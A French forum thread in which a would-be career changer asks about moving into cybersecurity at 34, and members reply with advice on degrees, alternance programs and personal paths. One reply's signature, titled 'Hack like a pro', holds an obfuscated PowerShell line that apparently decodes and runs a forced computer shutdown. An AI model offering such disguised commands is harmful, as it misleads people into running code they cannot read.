Annonce

Réduire
Aucune annonce.

Reconversion professionnelle

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Reconversion professionnelle

    Bonjour,

    Ça fait quelques années que je m'intéresse sur les sujets de cyber sécurité et je commence franchement à me dire que je suis passé à côté de la voie professionnelle la plus logique pour moi.

    Et pas que. Au niveau personnel, quand on aime le sujet, c'est très épanouissant.

    J'ai fait des études pour être webdesigner y'a quelques années, en gros je me suis rabattu la dessus. Manque de budget, et de temps. Mais de budget surtout à ce moment là.

    Je vais faire 35 ans à la fin de l'année, et je me demande si il est encore temps pour moi de parfaire mes connaissances pour être crédible dans ce domaine et arriver à faire quelque de sympa au niveau professionnel.

    Grâce à ma formation je connais très bien le html (c'est même pas le minimum légal pour un developpeur), un peu de php/sql mais c'est pas des langages que j'apprécie particulièrement. De ce que j'en ai vu la syntaxe python et C m'attirent bien plus.

    Au niveau de mes connaissances, pour imager on va dire que je peux monter un pc les yeux fermés de A à Z, établir un réseau, dépanner des problématiques liées au réseaux, dépanner une machine lié au hardware ou à un software. Avec de la volonté, je m'en sors toujours quoi.

    Le challenge ne me fait pas peur, sinon je posterai même pas ici.

    Sauf que sur le net, on trouve tout. Et n'importe quoi. Et dans ce domaine, j'ai un peu cherché et c'est pas évident de trouver des renseignements adaptés à ma situation.

    Du coup ma question serait, à 34 ans, c'est encore possible se reconvertir dans ce domaine ? Si oui quel voie conseilleriez vous ?

    Merci par avance !

  • #2
    Salut !

    Pour être tout a fait franc et objectif, c'est toujours possible, à condition que tu sois prêt à t'investir à un point qui te demandera des sacrifices, du genre :
    - Si t'as pas de bac +5 en info (idéalement dans la sécu), tu seras jamais recruté (oui c'est con) -> Du coup faut envisager de te lancer dans un programme de VAE ou M2 en cours du soir en plus de ton taff actuel. L'autre solution, c'est de passer des certifs et de t'expatrier à l'étranger (pays anglo-saxon notamment, qui font passer le niveau de diplome un peu apres).
    - Être prêt à revoir ton salaire à la baisse dans un premier temps, vu que tu repars à 0 coté XP. (Dans les faits, ça se négocie, mais faut quand même être conscient de ça).
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Merci pour ta réponse. Faire des sacrifices me fait pas peur, j'ai toujours bossé dur pour avoir ce que j'ai, si on me confirme que je peux atteindre ce but en bouffant du code, de la theorie et de la pratique dans mon coin, y'a aucun souci pour moi. Ça prendra le temps qui faut c'est pas grave ça.
      le salaire, honnêtement, même si je suis au smic en débutant, j'en ai rien à faire. Me pointer au taf avec des problématiques à résoudre, le sourire aux lèvres, c'est ça qui compte.

      après s'expatrier à l'étranger c'est la seule barrière pas franchissable pour moi là. Y'a quelques années en arrière ouais, mais aujourd'hui, et encore plus dans le futur c'est chaud.

      Commentaire


      • #4
        Shiddo, super objectif !!

        Comme l'a signalé Krisscool effectivement en France si tu n'as pas Bac+5 cela est clairement difficile et cela n'est pas faute d'un manque d'expert en sécurité. Toutefois voici quelque possibilité d'atteindre ton objectif:


        - https://www.orange-business.com/fr/d...-cybersecurite
        - http://www.aston-ecole.com/ESD.html
        - http://formations.univ-valenciennes....9U_PR_SOF-5899


        Il s'agit de licence sur 1 an l'avantage, il demande un niveau Bac+2/+3 en général, l'avantage est que cela peut se faire en alternance ce qui t'éviteras de payer des sommes astronomique pour des certifications, pour moi les deux premières sont leader dans le domaine.

        Bon courage a toi et fonce ;-)

        Commentaire


        • #5
          Merci pour les liens Gohy ! Ca à l'air hyper interessant. J'ai commencé à faire des recherches serieuses sur le sujet, mais comme j'ai dit plus haut, on trouve un peu tout sur le net. Faut que je me renseigne en aval pour pas me faire baiser. La motivation est là toute façon, ça fait pas tout mais c'est un bon point de départ !

          Commentaire


          • #6
            salut,

            je me permets d'intervenir pour te décrire mon parcours, j'ai toujours été un passionné d'informatique, côté études, j'ai fait un bac litéraire / maths (A1) , 3 ans de fac d' Anglais , j'ai exercé 14 ans la profession d'aide soignant, je suis maintenant sysadmin sur win, linux et surtout les OS IBM , AIX et Ibm i (5 certifications IBM) , Chef de projet , et je fais du reversing de malwares.
            je ne vais donc pas te dire que ce n'est pas possible ,
            je suis parti de la fonction publique, côté formations , même tech support informatique en alternance c'etait trop cher !!!
            donc j'ai eu l'opportunité d'intégrer une PME d'hébergement d'application ( cloud ASP, avec un vrai datacenter et tout ) en tant que technicien support Niv 1 , déjà pour entrer, galère, pas de diplôme mais un cv avec des compétences long comme le bras , en tant que fonctionnaire, j'ai profité des 35h pour bosser, sécu, réseaux, Système etc ... du coup je suis entré en période d'essai pour faire de la hotline.
            après avoir bypassé tous les systèmes de sécu en place et prouvé par divers POC bien foutus que la sécu de la boite laissait à désirer, on m'a tout de suite considéré autrement
            faut dire que j'avais déjà un beau palmares en indétection , crypters, RunPE et autres goumandises.

            les diplômes vont t'ouvrir les portes, les compétences vont les fermer derrière toi, le plus dur est de faire ses preuves dans l'entreprise.

            je parle bien sur pour mon cas, mon entreprise est en province, la politique en place c'est plutôt d'embaucher des BTS passionnés qui sont de suite rentables , pas d'ingés qu'on va payer plus cher (et encore) mais qui n'ont que du bagage "théorique" . ça marche à la gueule, il y a des techs niv2 qui sont mieux payés que les ingés...

            le risque d'avoir un trop haut niveau de diplôme c'est qu'on voudra pas te payer, on peut prendre 2 techs à la place.
            là c'est pour la province, côté capitale et gdes villes , je n'en sais rien ,







            Commentaire

            Chargement...
            X